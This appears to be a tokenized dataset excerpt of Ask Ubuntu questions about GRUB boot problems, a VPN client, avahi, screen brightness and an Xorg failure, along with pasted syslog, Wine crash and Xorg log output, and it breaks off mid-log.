mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:30 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:30 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:30 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:31 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:31 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:31 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:31 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:32 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:32 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:32 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:32 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:33 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:33 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:33 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:33 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:34 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:34 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:34 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:34 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:35 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:35 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:35 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:35 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:36 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:36 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:36 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:36 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:37 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:37 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:37 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:37 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:38 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:38 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:38 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:38 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:39 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:39 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:39 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:39 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:40 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:40 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:40 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:40 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:41 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:41 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:41 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:41 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:42 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:42 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:42 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:42 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:43 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:43 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:43 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:43 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:44 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:44 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:44 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:44 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:45 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:45 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:45 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:45 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:46 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:46 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:46 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:46 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:47 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:47 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:47 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:47 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:48 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:48 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:48 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:48 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:49 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:49 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit .
332533	i have recently installed ubuntu 12.04 to dual boot with windows 7 , but upon startup , the grub menu does not appear and boots into windows 7	i am running a single ssd . my motherboard has uefi bios , though i 'm not sure that helps . i 've tried holding shift on multiple startups without success .
332534	how to get netextender vpn client on ubuntu 13.04 working ?	i 've got a ubuntu 13.04 desktop and i need to connect to a sonicwall vpn appliance using netextender . tl , dr , the vpn connects fine , but then i ca n't reach any internet or lan websites . details : first i installed the right libraries and the most recent sun java ( not open jdk ) using this article : how to get netextender ( vpn ) working in ubuntu 12.10 x64 ? once i did that , and installed the most recent netextender client from the my sonicwall website , the connection succeeds . it 's configured for tunnel all mode so all traffic is supposed to go through the vpn , except that i ca n't reach any internet sites or lan sites . i 've duplicated this problem on a second ubuntu desktop , and i see it in 12.04 also . i can connect from mac or windows using the same account , so i do n't think it 's a problem with the sonicwall policies or user account .
332535	select packages related to some program in apt archive	suppose that i have installed a program `` someprogram '' . now , i want to select the .deb packages that were downloaded into /var/cache/apt/archive folder . how can i select the packages related to someprogram in /var/cache/apt/archive ?
332542	grub not showing on startup	i have a laptop dual booted with windows 8 and ubuntu 13 . when the computer boots , it goes straight to windows . the only way i can get to grub is to reboot windows into advanced boot mode with shutdown /r /o /t 0 . this first happened after the windows 8.1 preview install failed . i had to do a system refresh to get windows working again . it was the same , but after running boot-repair , it worked fine . i do n't know what caused the issue this time . however , running boot-repair does n't work . also this time , it gives me this message : the boot files of [ the os now in use - ubuntu 13.04 ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) i do n't know how to make this partition or how it will affect my system . the windows partition is first . i do n't know if this partition existed but windows deleted it , or if it never existed and something else has changed . my partitions on my single hard drive are /dev/sda1 fat32 300 mib system /dev/sda2 ntfs 600 mib recovery //the windows recovery partition , i think /dev/sda3 unknown 128 mib /dev/sda4 ntfs 137.37 gib os //the windows partition /dev/sda6 ext4 135.83 gib //the linux partition /dev/sda7 linux-swap 3.89 gib /dev/sda5 ntfs 10.4 gib restore thank you in advance . if you need more information , please ask .
332543	how can i run a script when i unmount a particular usb drive ?	i am trying to sync between a folder and usb drive , so that a ) when i plug in a particular usb drive , a script runs to copy any newer files from the usb to the folder ; and b ) when i unmount the drive ( click eject in nautilus ) , a script runs to copy any newer files from the folder to the usb . i am confident that i can use udev and rsync to accomplish part a ) , but how can i achieve part b ) ?
332547	i try start up artemis	i try start up artemis but i got this respons : unhandled exception : page fault on read access to 0x00000000 in 32-bit code ( 0x0041c356 ) . register dump : cs:0073 ss:007b ds:007b es:007b fs:0033 gs:003b eip:0041c356 esp:0033f22c ebp:0033fac4 eflags:00210202 ( r- -- i - - - ) eax:00000000 ebx : ff000000 ecx:004b8fd1 edx:00000000 esi:02f684a8 edi:02f684ac stack dump : 0x0033f22c : 02f684a8 02f69078 0033fac4 00000000 0x0033f23c : 0041bf62 0033fac4 0050ecc0 b9081f3f 0x0033f24c : 031ed3f8 0033fac4 0033fa94 02d4f02c 0x0033f25c : 000003e8 000003e8 00000000 00000000 0x0033f26c : 00000000 02f684a8 00000000 00001000 0x0033f27c : 00000010 00000000 520b9bc0 289919b7 backtrace : = > 0 0x0041c356 in artemis ( +0x1c356 ) ( 0x0033fac4 ) 1 0x00000012 ( 0x02d763d8 ) 2 0x005c0074 in d3dx9_24 ( +0x73 ) ( 0x00610064 ) 0x0041c356 : movl 0x0 ( % eax ) , % ecx modules : module address debug info name ( 119 modules ) pe 400000- 5b5000 export artemis pe 5c0000- 7f8000 export d3dx9_24 pe 10000000-10039000 deferred ftd2xx elf 7b800000-7ba5b000 deferred kernel32 < elf > \-pe 7b810000-7ba5b000 \ kernel32 elf 7bc00000-7bcd9000 deferred ntdll < elf > \-pe 7bc10000-7bcd9000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7c486000-7c49d000 deferred libresolv.so.2 elf 7c49d000-7c4a5000 deferred libogg.so.0 elf 7c4a5000-7c4d1000 deferred libvorbis.so.0 elf 7c4d1000-7c649000 deferred libvorbisenc.so.2 elf 7c649000-7c699000 deferred libflac.so.8 elf 7c699000-7c6a0000 deferred libasyncns.so.0 elf 7c6a0000-7c714000 deferred libsndfile.so.1 elf 7c714000-7c71e000 deferred libwrap.so.0 elf 7c71e000-7c768000 deferred libdbus-1.so.3 elf 7c768000-7c7d3000 deferred libpulsecommon-3.0.so elf 7c7d3000-7c822000 deferred libpulse.so.0 elf 7c83b000-7c863000 deferred winepulse < elf > \-pe 7c840000-7c863000 \ winepulse elf 7c863000-7c997000 deferred oleaut32 < elf > \-pe 7c880000-7c997000 \ oleaut32 elf 7cfa1000-7cfab000 deferred libjson.so.0 elf 7cfab000-7cfcd000 deferred mmdevapi < elf > \-pe 7cfb0000-7cfcd000 \ mmdevapi elf 7d2c9000-7d2fd000 deferred libtxc_dxtn.so elf 7d2fd000-7d308000 deferred libpciaccess.so.0 elf 7d308000-7d325000 deferred libgcc_s.so.1 elf 7d40e000-7d431000 deferred libdrm_intel.so.1 elf 7d431000-7d7f5000 deferred libdricore9.1.3.so.1 elf 7d7f5000-7d8cc000 deferred i965_dri.so elf 7d8cc000-7d8d9000 deferred libdrm.so.2 elf 7d8d9000-7d8de000 deferred libxcb-dri2.so.0 elf 7d8de000-7d8f6000 deferred libxcb-glx.so.0 elf 7d8f6000-7d8f9000 deferred libx11-xcb.so.1 elf 7d8f9000-7d8fd000 deferred libxdamage.so.1 elf 7d8fd000-7d956000 deferred libgl.so.1 elf 7d96f000-7da7d000 deferred opengl32 < elf > \-pe 7d990000-7da7d000 \ opengl32 elf 7da7d000-7dbbe000 deferred wined3d < elf > \-pe 7da90000-7dbbe000 \ wined3d elf 7dbbe000-7dbfb000 deferred d3d9 < elf > \-pe 7dbc0000-7dbfb000 \ d3d9 elf 7dbfb000-7dc1f000 deferred imm32 < elf > \-pe 7dc00000-7dc1f000 \ imm32 elf 7dc1f000-7dc61000 deferred usp10 < elf > \-pe 7dc30000-7dc61000 \ usp10 elf 7dc61000-7dc97000 deferred uxtheme < elf > \-pe 7dc70000-7dc97000 \ uxtheme elf 7dc97000-7dc9e000 deferred libxfixes.so.3 elf 7dc9e000-7dca9000 deferred libxcursor.so.1 elf 7dca9000-7dcb9000 deferred libxi.so.6 elf 7dcb9000-7dcbd000 deferred libxcomposite.so.1 elf 7dcbd000-7dcc8000 deferred libxrandr.so.2 elf 7dcc8000-7dcd2000 deferred libxrender.so.1 elf 7dcd2000-7dcd8000 deferred libxxf86vm.so.1 elf 7dcd8000-7dcdc000 deferred libxinerama.so.1 elf 7dcdc000-7dce3000 deferred libxdmcp.so.6 elf 7dce3000-7dce7000 deferred libxau.so.6 elf 7dce7000-7dd09000 deferred libxcb.so.1 elf 7dd09000-7dd0f000 deferred libuuid.so.1 elf 7dd0f000-7dd29000 deferred libice.so.6 elf 7dd29000-7de60000 deferred libx11.so.6 elf 7de60000-7de72000 deferred libxext.so.6 elf 7de72000-7de7b000 deferred libsm.so.6 elf 7de7b000-7de92000 deferred libglapi.so.0 elf 7de94000-7df26000 deferred winex11 < elf > \-pe 7dea0000-7df26000 \ winex11 elf 7df91000-7dfb9000 deferred libexpat.so.1 elf 7dfb9000-7dff2000 deferred libfontconfig.so.1 elf 7dff2000-7e08d000 deferred libfreetype.so.6 elf 7e08d000-7e0b8000 deferred msacm32 < elf > \-pe 7e090000-7e0b8000 \ msacm32 elf 7e0b8000-7e1f4000 deferred ole32 < elf > \-pe 7e0d0000-7e1f4000 \ ole32 elf 7e1f4000-7e2ae000 deferred winmm < elf > \-pe 7e200000-7e2ae000 \ winmm elf 7e2ae000-7e2f6000 deferred dsound < elf > \-pe 7e2b0000-7e2f6000 \ dsound elf 7e2f6000-7e39e000 deferred msvcrt < elf > \-pe 7e310000-7e39e000 \ msvcrt elf 7e39e000-7e3d4000 deferred ws2_32 < elf > \-pe 7e3b0000-7e3d4000 \ ws2_32 elf 7e3d4000-7e4dc000 deferred comctl32 < elf > \-pe 7e3e0000-7e4dc000 \ comctl32 elf 7e4dc000-7e70f000 deferred shell32 < elf > \-pe 7e4f0000-7e70f000 \ shell32 elf 7e70f000-7e789000 deferred shlwapi < elf > \-pe 7e720000-7e789000 \ shlwapi elf 7e789000-7e7b0000 deferred mpr < elf > \-pe 7e790000-7e7b0000 \ mpr elf 7e7b0000-7e7c9000 deferred libz.so.1 elf 7e7e2000-7e85d000 deferred wininet < elf > \-pe 7e7f0000-7e85d000 \ wininet elf 7e85d000-7e8de000 deferred rpcrt4 < elf > \-pe 7e870000-7e8de000 \ rpcrt4 elf 7e8de000-7e8f8000 deferred version < elf > \-pe 7e8e0000-7e8f8000 \ version elf 7e8f8000-7e967000 deferred advapi32 < elf > \-pe 7e900000-7e967000 \ advapi32 elf 7e967000-7ea85000 deferred gdi32 < elf > \-pe 7e970000-7ea85000 \ gdi32 elf 7ea85000-7ebe0000 deferred user32 < elf > \-pe 7eaa0000-7ebe0000 \ user32 elf 7ebe0000-7ec50000 deferred setupapi < elf > \-pe 7ebf0000-7ec50000 \ setupapi elf 7ec50000-7ec5d000 deferred libnss_files.so.2 elf 7ec5d000-7ec69000 deferred libnss_nis.so.2 elf 7ec69000-7ec82000 deferred libnsl.so.1 elf 7ec82000-7ec8b000 deferred libnss_compat.so.2 elf 7efbd000-7f000000 deferred libm.so.6 elf b73e5000-b73ee000 deferred librt.so.1 elf b73ef000-b73f4000 deferred libdl.so.2 elf b73f4000-b75a7000 deferred libc.so.6 elf b75a8000-b75c3000 deferred libpthread.so.0 elf b75dc000-b7792000 dwarf libwine.so.1 elf b7794000-b77b6000 deferred ld-linux.so.2 elf b77b6000-b77b7000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 00000066 0 0000003a 0 00000033 0 0000002d 0 00000024 0 00000017 0 00000010 0 0000000f 0 00000012 agile1pservice.exe 00000021 0 00000020 2 0000001d 0 0000001b 0 0000001a 0 00000016 0 00000013 0 0000001e applemobiledeviceservice.exe 0000004b 0 00000019 0 00000009 0 00000067 0 00000052 0 00000051 0 00000044 0 00000041 0 0000003e 0 0000002a 0 00000029 0 00000028 0 00000026 0 00000023 0 0000001f 0 0000002b mdnsresponder.exe 00000030 0 0000002f 0 0000002c 0 00000031 winedevice.exe 00000039 0 00000036 0 00000035 0 00000032 0 00000037 plugplay.exe 0000003d 0 0000003c 0 00000038 0 00000047 explorer.exe 0000000b 0 00000027 0 0000005c explorer.exe 00000054 0 00000060 0 00000014 ( d ) c : \program files\artemis\artemis.exe 00000042 15 00000048 0 0000005a 0 00000056 15 00000022 0 < == system information : wine build : wine-1.6 platform : i386 host system : linux host version : 3.8.0-27-generic
332548	version of ubuntu for sugarcrm	i have a windows xp pc i want to convert to ubuntu and install sugarcrm on . not for productive use just for learning . do i need a server edition of ubuntu , or can i just use a desktop edition ? thanks .
332551	configure an avahi reflector to broadcast the address for only certain airplay targets	i 'm looking to configure the avahi daemon in reflector mode ( which i have working ) to reflect only certain airplay targets to the other networks . anyone have a solution for this ?
332554	lenovo t410 running ubuntu 12.04 wo n't change brightness	neither the fn + home or the fn + end ( brighter/dimmer ) or using the gui changes the brightness . i 've looked up some possible solutions , all of which involve editing an obscure text file . none of the other solutions had specifically been for 12.04 . i am hesitant to try editing small text files when the intended version is different than the one i use . any threads or suggestions ?
332556	no screens found suddenly	i can not run window manager . everything worked ok for a couple of weeks but now , after one power loss , i can not boot up my computer . [ 9.129 ] x.org x server 1.13.0 release date : 2012-09-05 [ 9.129 ] x protocol version 11 , revision 0 [ 9.129 ] build operating system : linux 2.6.42-37-generic x86_64 ubuntu [ 9.129 ] current operating system : linux beacher 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 [ 9.129 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-37-generic root=uuid=281dc046-dff3-4a7d-a07d-73ed171f87b0 ro nomodeset [ 9.129 ] build date : 11 april 2013 11:49:23pm [ 9.129 ] xorg-server 2:1.13.0-0ubuntu6.1~precise3 ( for technical support please see http : //www.ubuntu.com/support ) [ 9.129 ] current version of pixman : 0.24.4 [ 9.129 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 9.129 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 9.129 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed aug 14 15:32:21 2013 [ 9.130 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 9.130 ] ( == ) no layout section . using the first screen section . [ 9.130 ] ( == ) no screen section available . using defaults . [ 9.130 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 9.130 ] ( ** ) | | -- > monitor `` '' [ 9.131 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 9.131 ] ( == ) automatically adding devices [ 9.131 ] ( == ) automatically enabling devices [ 9.131 ] ( == ) automatically adding gpu devices [ 9.131 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 9.131 ] entry deleted from font path . [ 9.131 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 9.131 ] entry deleted from font path . [ 9.131 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 9.131 ] entry deleted from font path . [ 9.131 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 9.131 ] entry deleted from font path . [ 9.131 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 9.131 ] entry deleted from font path . [ 9.131 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 9.131 ] entry deleted from font path . [ 9.131 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 9.131 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 9.131 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 9.131 ] ( ii ) loader magic : 0x7fc2ff7ccc20 [ 9.131 ] ( ii ) module abi versions : [ 9.131 ] x.org ansi c emulation : 0.4 [ 9.131 ] x.org video driver : 13.0 [ 9.131 ] x.org xinput driver : 18.0 [ 9.131 ] x.org server extension : 7.0 [ 9.131 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 9.135 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:2a42:17aa:20e4 rev 7 , mem @ 0xf2000000/4194304 , 0xd0000000/268435456 , i/o @ 0x00001800/8 [ 9.135 ] ( -- ) pci : ( 0:0:2:1 ) 8086:2a43:17aa:20e4 rev 7 , mem @ 0xf2400000/1048576 [ 9.138 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 9.138 ] initializing built-in extension generic event extension [ 9.138 ] initializing built-in extension shape [ 9.138 ] initializing built-in extension mit-shm [ 9.138 ] initializing built-in extension xinputextension [ 9.138 ] initializing built-in extension xtest [ 9.138 ] initializing built-in extension big-requests [ 9.138 ] initializing built-in extension sync [ 9.138 ] initializing built-in extension xkeyboard [ 9.138 ] initializing built-in extension xc-misc [ 9.138 ] initializing built-in extension security [ 9.138 ] initializing built-in extension xinerama [ 9.138 ] initializing built-in extension xfixes [ 9.138 ] initializing built-in extension render [ 9.138 ] initializing built-in extension randr [ 9.138 ] initializing built-in extension composite [ 9.138 ] initializing built-in extension damage [ 9.138 ] initializing built-in extension mit-screen-saver [ 9.138 ] initializing built-in extension double-buffer [ 9.138 ] initializing built-in extension record [ 9.138 ] initializing built-in extension dpms [ 9.138 ] initializing built-in extension x-resource [ 9.138 ] initializing built-in extension xvideo [ 9.138 ] initializing built-in extension xvideo-motioncompensation [ 9.138 ] initializing built-in extension xfree86-vidmodeextension [ 9.138 ] initializing built-in extension xfree86-dga [ 9.138 ] initializing built-in extension xfree86-dri [ 9.138 ] initializing built-in extension dri2 [ 9.138 ] ( ii ) loadmodule : `` glx '' [ 9.142 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 9.143 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 9.143 ] compiled for 1.13.0 , module version = 1.0.0 [ 9.143 ] abi class : x.org server extension , version 7.0 [ 9.143 ] ( == ) aiglx enabled [ 9.143 ] loading extension glx [ 9.143 ] ( == ) matched intel as autoconfigured driver 0 [ 9.143 ] ( == ) matched intel as autoconfigured driver 1 [ 9.143 ] ( == ) matched vesa as autoconfigured driver 2 [ 9.143 ] ( == ) matched modesetting as autoconfigured driver 3 [ 9.143 ] ( == ) matched fbdev as autoconfigured driver 4 [ 9.143 ] ( == ) assigned the driver to the xf86configlayout [ 9.143 ] ( ii ) loadmodule : `` intel '' [ 9.143 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 9.143 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 9.143 ] compiled for 1.13.0 , module version = 2.20.9 [ 9.143 ] module class : x.org video driver [ 9.143 ] abi class : x.org video driver , version 13.0 [ 9.143 ] ( ii ) loadmodule : `` vesa '' [ 9.144 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 9.144 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 9.144 ] compiled for 1.13.0 , module version = 2.3.2 [ 9.144 ] module class : x.org video driver [ 9.144 ] abi class : x.org video driver , version 13.0 [ 9.144 ] ( ii ) loadmodule : `` modesetting '' [ 9.144 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 9.144 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 9.144 ] compiled for 1.13.0 , module version = 0.5.0 [ 9.144 ] module class : x.org video driver [ 9.144 ] abi class : x.org video driver , version 13.0 [ 9.144 ] ( ii ) loadmodule : `` fbdev '' [ 9.144 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 9.144 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 9.144 ] compiled for 1.13.0 , module version = 0.4.3 [ 9.144 ] module class : x.org video driver [ 9.144 ] abi class : x.org video driver , version 13.0 [ 9.144 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , hd graphics , hd graphics 4600 , haswell desktop ( gt3 ) , hd graphics , hd graphics 4600 , haswell mobile ( gt3 ) , hd graphics , hd graphics p4600/p4700 , haswell server ( gt3 ) , haswell ( gt1 ) , haswell ( gt2 ) , haswell ( gt3 ) , hd graphics , haswell ( gt2 ) , haswell ( gt3 ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt3 ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt3 ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4400 , hd graphics 5000 , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , iris ( tm ) graphics 5100 , haswell ult ( gt1 ) , haswell ult ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4200 , iris ( tm ) graphics 5100 , haswell crw desktop ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw mobile ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , valleyview po board [ 9.145 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 9.145 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 9.145 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 9.145 ] ( ++ ) using vt number 7 [ 9.146 ] ( ii ) intel ( 0 ) : using device path '/dev/dri/card0' [ 9.146 ] ( ww ) falling back to old probe method for vesa [ 9.146 ] ( ww ) falling back to old probe method for modesetting [ 9.146 ] ( ww ) falling back to old probe method for fbdev [ 9.146 ] ( ii ) loading sub module `` fbdevhw '' [ 9.146 ] ( ii ) loadmodule : `` fbdevhw '' [ 9.146 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 9.146 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 9.146 ] compiled for 1.13.0 , module version = 0.0.2 [ 9.146 ] abi class : x.org video driver , version 13.0 [ 9.146 ] ( ee ) open /dev/fb0 : no such file or directory [ 9.146 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 9.146 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 9.146 ] ( == ) intel ( 0 ) : rgb weight 888 [ 9.146 ] ( == ) intel ( 0 ) : default visual is truecolor [ 9.146 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) gm45 [ 9.146 ] ( ** ) intel ( 0 ) : relaxed fencing enabled [ 9.146 ] ( ** ) intel ( 0 ) : wait on swapbuffers ? enabled [ 9.146 ] ( ** ) intel ( 0 ) : triple buffering ? enabled [ 9.146 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 9.146 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 9.146 ] ( ** ) intel ( 0 ) : 3d buffers tiled [ 9.146 ] ( ** ) intel ( 0 ) : swapbuffers wait enabled [ 9.146 ] ( == ) intel ( 0 ) : video overlay key set to 0x101fe [ 9.147 ] ( ee ) intel ( 0 ) : failed to get resources : invalid argument [ 9.147 ] ( ii ) 